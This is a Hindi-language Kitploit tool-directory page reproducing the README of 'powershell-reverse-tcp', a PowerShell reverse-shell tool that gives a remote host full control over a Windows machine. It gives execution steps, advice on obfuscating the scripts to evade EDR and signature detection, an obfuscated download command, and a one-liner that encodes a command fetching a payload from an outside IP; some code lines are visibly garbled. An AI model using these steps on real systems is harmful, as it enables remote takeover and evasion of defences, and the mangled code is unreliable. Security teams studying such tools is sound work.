Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
powershell-reverse-tcp — रिमोट होस्ट के साथ संवाद करने के लिए PowerShell स्क्रिप्ट्स। | Kitploit
उपकरण/GitHubGitHub/ivan-sincek/powershell-reverse-tcp
विशेषाधिकार वृद्धिशोषणआईडीएस/आईपीएस से बचनापार्श्व आंदोलनपोस्ट-शोषणकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंट
GitHubivan-sincek/powershell-reverse-tcp

powershell-reverse-tcp

रिमोट होस्ट के साथ संवाद करने के लिए PowerShell स्क्रिप्ट्स।

30065111 महीना पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

पावरशेल रिवर्स टीसीपी

दूरस्थ होस्ट के साथ संचार के लिए पावरशेल स्क्रिप्ट्स।

दूरस्थ होस्ट का क्लाइंट और सभी अंतर्निहित सिस्टम कमांड पर पूर्ण नियंत्रण होगा।

इन पर आधारित शेल देखें:

  • यहाँ Invoke-Expression पावरशेल कमांड,
  • यहाँ प्रोसेस पाइप्स।

विंडोज 10 एंटरप्राइज OS (64-बिट) पर पावरशेल v5.1.19041.2673 के साथ परीक्षण किया गया।

शैक्षिक उद्देश्यों के लिए बनाया गया। मुझे उम्मीद है कि यह मदद करेगा!

इस रिपॉजिटरी में ज्ञात हस्ताक्षर होने लगे हैं और मेरे पास हर बार नई स्क्रिप्ट अपलोड करने का समय नहीं है, इसलिए आपको इन स्क्रिप्ट्स को स्वयं अस्पष्ट करना चाहिए।

भविष्य की योजनाएँ:

  • प्रोसेस पाइप्स पर आधारित अधिक शेल, और उन्हें और अनुकूलित करना।

विषय सूची

  • कैसे चलाएँ
  • पावरशेल स्क्रिप्ट्स को अस्पष्ट करें
    • पावरशेल एन्कोडेड कमांड
    • SecureString
  • AMSI बाइपास
  • MS Word एकीकरण
  • लिसनर सेट अप करें
  • रनटाइम

कैसे चलाएँ

स्क्रिप्ट्स में आवश्यकतानुसार IP पता और पोर्ट नंबर बदलें।

पावरशेल को \src\invoke_expression\original\ या \src\process_pipes\original\ से खोलें और नीचे दिखाए गए कमांड चलाएँ।

निष्पादन नीति सेट करें:```pwsh Set-ExecutionPolicy Unrestricted

स्क्रिप्ट चलाएँ:```pwsh
.\powershell_reverse_tcp.ps1

या, निम्नलिखित कमांड को PowerShell या Command Prompt से चलाएँ:```pwsh PowerShell -ExecutionPolicy Unrestricted -File .\powershell_reverse_tcp.ps1

## PowerShell स्क्रिप्ट को अस्पष्ट करें

EDR और अन्य सुरक्षा तंत्रों को बायपास करने का प्रयास करें, अपनी स्क्रिप्ट को अस्पष्ट करके। आप नीचे दिए गए उदाहरणों में ऐसे अस्पष्टीकरण देख सकते हैं।

मूल PowerShell कमांड:```pwsh
(New-Object Net.WebClient).DownloadFile($url, $out)

अस्पष्ट PowerShell कमांड:```pwsh & (GCM *ke-E*) '(& (GCM ew-O) NET.WEBCLIENT)."DOWNLOADFIL`E"($url, $out)'

**मूल PowerShell स्क्रिप्ट [यहाँ](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/original/powershell_reverse_tcp.ps1) और पूरी तरह से अस्पष्टीकृत स्क्रिप्ट [यहाँ](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/invoke_obfuscation/powershell_reverse_tcp_obfuscated.ps1) देखें।**

[मैन्युअल अस्पष्टीकरण](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/powershell_reverse_tcp_manual.ps1) के बाद, मूल PowerShell स्क्रिप्ट को [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) के साथ अस्पष्टीकृत किया गया था। लेखक को श्रेय!

अतिरिक्त अस्पष्टीकरण तकनीकों और विधियों के लिए इंटरनेट पर खोजें।

P.S. चूंकि PowerShell लगातार अपडेट हो रहा है, कुछ रेगुलर एक्सप्रेशन (जैसे `*ke-E*`) एक ही एक्सप्रेशन से मेल खाने वाली कई विधियों के कारण अपवाद फेंकना शुरू कर सकते हैं, इसलिए एक्सप्रेशन को थोड़ा बेहतर निर्दिष्ट करने की आवश्यकता होगी।

### PowerShell एन्कोडेड कमांड

एक PowerShell स्क्रिप्ट से PowerShell एन्कोडेड कमांड उत्पन्न करने के लिए, निम्नलिखित PowerShell कमांड चलाएँ:

$text = "(New-Object System.Net.WebClient).DownloadString('http://192.168.8.119/powershell_reverse_tcp.txt')" $bytes = [System.Text.Encoding]::Unicode.GetBytes($text) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand

[Convert]:https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/:ToBase64String(%5BText.Encoding%5D::Unicode.GetBytes(%5BIO.File%5D::ReadAllText($script)))
```
PowerShell एन्कोडेड कमांड को डीकोड करने के लिए, निम्नलिखित PowerShell कमांड चलाएँ:```pwsh
[Text.Encoding]:https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/:Unicode.GetString(%5BConvert%5D::FromBase64String($command))
```
यदि आप कोई कलाकृतियाँ पीछे नहीं छोड़ना चाहते हैं तो नीचे दिए गए एक-लाइनर्स का उपयोग करें।

---
```
टूल डाउनलोड करें